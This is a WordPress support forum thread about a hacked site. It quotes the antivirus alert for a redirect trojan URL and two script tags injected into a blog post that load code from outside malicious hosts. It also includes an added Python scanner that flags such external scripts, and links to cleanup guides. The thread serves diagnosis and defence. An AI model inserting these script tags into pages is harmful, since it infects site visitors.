matthewpaul
Member
Posted 1 year ago #
The last 3 days, when visiting one of my sites (http://www.bullsource.com), I've received a virus warning from Avast containing this info:
http://edisonsbar.com/in.cgi?4|>{gzip} [L] HTML:RedirME-inf [Trj] (0)
I've only been able to replicate this once per day. I searched this on Google and found this: http://jsunpack.jeek.org/dec/go?report=226656eee9412647c8c49c892e9473200486e1eb.
Does anyone know what this means?
matthewpaul
Member
Posted 1 year ago #
I was able to reproduce the issue again.
When visiting the site, my virus protection program, Avast, shows this message:
TROJAN HORSE BLOCKED
avast Web Shield has blocked a threat. No further action is required.
Object: http://edisonsbar.com/in.cgi?4|>{gzip}
Infection: HTML:RedirME-inf [Trj]
Action: Connection aborted
Process: C:\Program Files\Mozilla\Firefox\firefox.exe
The threat was detected and blocked while downloading an item from the web.
matthewpaul
Member
Posted 1 year ago #
This is happening on one of my other WordPress sites (on the same server). I noticed that this malicious code was being inserted into the index page within the code of the first blog post:
<h5><script src=http://maroon.karenegren.com/js/jquery.min.js></script></h5>
and
<h5><script src=http://yellow.gaindirectory.org/js/jquery.min.js></script></h5>
I never added this code and it's not in the template file of the theme.
I believe this is part of a current hack that is injecting code into all PHP files (not just WordPress) on a few shared hosting providers. Remain calm and carefully follow this guide:
http://codex.wordpress.org/FAQ_My_site_was_hacked
matthewpaul
Member
Posted 1 year ago #
My non-WordPress sites (on the same server) are unaffected. I contacted the hosting provider (mt) and they haven't had any other reports of this.
matthewpaul
Member
Posted 1 year ago #
It appears that the hack was injected into the database, not the PHP files. The malicious code was added to a blog post.
Remove the code from the post, then run through this guide to make sure that nothing else is wrong:
http://codex.wordpress.org/FAQ_My_site_was_hacked
When you're done, implement some (if not all) of the recommended security measures:
http://codex.wordpress.org/Hardening_WordPress
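One way to find posts carrying an injected tag like the ones quoted in this thread, as an added example that is not part of the original posts: it parses each post body and reports `<script>` tags loaded from a host outside an allowlist. The sample rows are constructed stand-ins for an export of the `wp_posts` table (ID, post_content), and the function names and the allowlist are assumptions of this example.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class ScriptSrcCollector(HTMLParser):
    """Collects the src attribute of every <script> tag, quoted or not."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            for name, value in attrs:
                if name == "src" and value:
                    self.sources.append(value.strip())


def external_scripts(post_content, trusted_hosts):
    """Return script URLs in post_content whose host is not trusted."""
    collector = ScriptSrcCollector()
    collector.feed(post_content)
    collector.close()
    flagged = []
    for src in collector.sources:
        host = (urlparse(src).hostname or "").lower()
        # Relative URLs have no host and load from the site itself.
        if host and host not in trusted_hosts:
            flagged.append(src)
    return flagged


def scan_posts(rows, trusted_hosts):
    """rows: iterable of (post_id, post_content). Returns {post_id: [urls]}."""
    hits = ((pid, external_scripts(body, trusted_hosts)) for pid, body in rows)
    return {pid: urls for pid, urls in hits if urls}


# Constructed sample rows standing in for an export of wp_posts
# (ID, post_content); row 12 carries the tag quoted in this thread.
SAMPLE_ROWS = [
    (11, '<p>Recap</p><script src="/wp-includes/js/jquery/jquery.js"></script>'),
    (12, '<h5><script src=http://maroon.karenegren.com/js/jquery.min.js></script></h5>'),
    (13, '<p>No scripts here.</p>'),
]
TRUSTED = {"www.bullsource.com"}  # assumption: the site's own hostname

if __name__ == "__main__":
    print(scan_posts(SAMPLE_ROWS, TRUSTED))
```

A flagged post ID only tells you where to look; review the post in the editor before removing anything, since legitimate embeds also load scripts from other hosts.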
matthewpaul
Member
Posted 1 year ago #
Do you know of a good plugin to install for security? The recommended ones seem to be outdated and I was experiencing issues with Secure WordPress.
I honestly don't recommend any of them. Most of the current security plugins simply scan for "vulnerabilities" and the rest simply provide a software method of implementing the recommended security measures. If you used a plugin like that, all a hacker would have to do is reset your plugins to drop all of your security measures. It's better to follow the guide that I linked to and manually implement the security measures.
matthewpaul
Member
Posted 1 year ago #